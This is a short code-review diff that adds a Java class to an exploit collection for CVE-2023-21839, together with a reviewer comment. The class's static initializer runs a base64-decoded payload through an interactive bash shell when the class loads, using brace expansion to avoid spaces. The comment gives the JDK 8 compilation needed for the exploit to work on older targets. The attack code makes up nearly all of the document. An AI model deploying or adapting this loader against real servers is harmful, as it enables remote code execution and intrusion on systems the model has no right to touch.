data/exploits/CVE-2023-21839/PayloadRuns.java

```diff
@@ -0,0 +1,9 @@
+public class PayloadRuns {
+    static {
+        try {
+            Runtime.getRuntime().exec("bash -c {echo,PAYLOAD}|{base64,-d}|{bash,-i}");
+        } catch (Exception ex) {
+            ex.printStackTrace();
+        }
+    }
+}
```

Comment:
Note for future travelers, this had to be compiled using JDK 8 for it to work on the target. Newer versions of JDK use some different byteclass version other than the expected 52.0 bytecode so they have newer features that the target might not be able to decode if its running an older Java version.